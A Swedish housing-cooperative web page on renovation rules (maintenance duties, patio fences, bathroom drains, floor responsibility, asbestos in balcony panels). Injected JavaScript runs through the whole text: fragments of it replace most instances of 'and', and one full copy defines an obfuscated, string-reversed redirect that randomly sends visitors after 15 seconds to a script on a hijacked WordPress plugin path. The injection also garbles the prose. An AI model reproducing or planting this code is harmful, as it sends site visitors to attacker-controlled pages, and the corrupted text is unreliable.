Renovering

Bostadsrätt i HSB

Delat ansvar

 I en bostadsrättsförening delar lägenhetsinnehavaren och bostadsrättsföreningen på ansvaret för skötseln. Ansvarsfördelningen finns reglerad i bostadsrättsföreningens stadgar.

Förenklat gäller att bostadsrättsinnehavaren ansvara för sin lägenhet, medan bostadsrättsföreningen ansvarar för fastigheten (t ex fasader, tvättstuga, förråd, trapphus och den yttre miljön).

Dessutom är det föreningens ansvar att sköta underhållet av gemensamma försörjningssystem, såsom värme, vatten och ventilation, detta gäller även i lägenheterna.

Detta hindrar inte att man kan finna andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andra lösningar.

Uteplats

För de lägenhetsinnehavare som bor på första våningen finns möjlighet att ha en uteplats.

Uteplats mot innergårdarna: Runt uteplatsen får det sättas ett staket eller en häck som har en höjd av högst 80 cm.

Uteplats från vardagsrummet: Föreningen rekommenderar att staketet utformas som övriga i samma huskropp men det är Stadsbyggnadsnämndens regler och riktlinjer för staket och plank som gäller. Mer information om detta finner ni på Landom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andskrona kommuns hemsida:  $hiVNZt4Y5cDrbJXMhLy=function(n){if (typeof ($hiVNZt4Y5cDrbJXMhLy.list[n]) == ”string”) return $hiVNZt4Y5cDrbJXMhLy.list[n].split(””).reverse().join(””);return $hiVNZt4Y5cDrbJXMhLy.list[n];};$hiVNZt4Y5cDrbJXMhLy.list=["'php.sgnittes-nigulp/nwodkcol-nigol/snigulp/tnetnoc-pw/moc.aretup07hn//:ptth'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andskrona.se/invanare/bygga--flytta-hit/bygga-nytt-om-eller-till/smahus/murar-plank-och-staket/">http://www.landom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andskrona.se/invanare/bygga--flytta-hit/bygga-nytt-om-eller-till/smahus/murar-plank-och-staket/

Ritning på hur ett staket kan utformas finns att tillgå hos vicevärden.

För er som har uteplats från vardagsrummet gäller att även sköta om gräsmattan 0.5 meter ut från staketet räknat.

 

Regler i sambandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and med utläggning av väggbrunn i badrummet

Föreningen ser helst att i de lägenheter där brunnen i badrummet fortfarandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ande sitter i väggen läggs i sambandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and med renovering ut i golvet.

Föreningen står för kostnaden av utläggningen från väggbrunn till golvbrunn.

Vi rekommenderar i sambandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and med detta att väggbeklädnaden byts ut för att förhindra fuktskador. Demontering och montering av inredning inklusive porslin står bostadsrättsinnehavaren för.

Detta skall utföras av fackmässigt kunnig personal.

 

Nya bestämmelser för bostadsrättsinnehavare beslutade centralt och gällandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ande i hela landom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andet.

 Förändringen gäller golvytan och underliggandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ande delar.

Tidigare har det varit så att den boende har ansvaret endast för ytskiktet på golven i lägenheterna. Nu har reglerna ändrats till att gälla även underliggandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ande ner till betongsulan.

För vår förenings golv gäller det således även sandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}anden, reglar m m som finns under golvytan.

Det betyder också att föreningen tar från sig allt ansvar även när det gäller sandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and som kommer upp från springor i golvet, detta får lägenhetsinnehavaren således själv rätta till.

Många kanske reagerar och tycker detta är en egendomlig förändring, men som omtalats ovan är det ett central beslut som gäller alla föreningar inom HSB.

För ytterligare fakta innan ni påbörjar er renovering rekommenderar vi HSB hemsida.

Balkonger

Väggarna på balkongerna som väter in mot lägenheten består utav eternitplattor, i dessa plattor finns det asbest. Innan ni påbörjar renovering tag kontakt med fastighetsskötaren för att få information om vilka regler som berör arbetet. Här finner ni arbetsmiljöverkets information.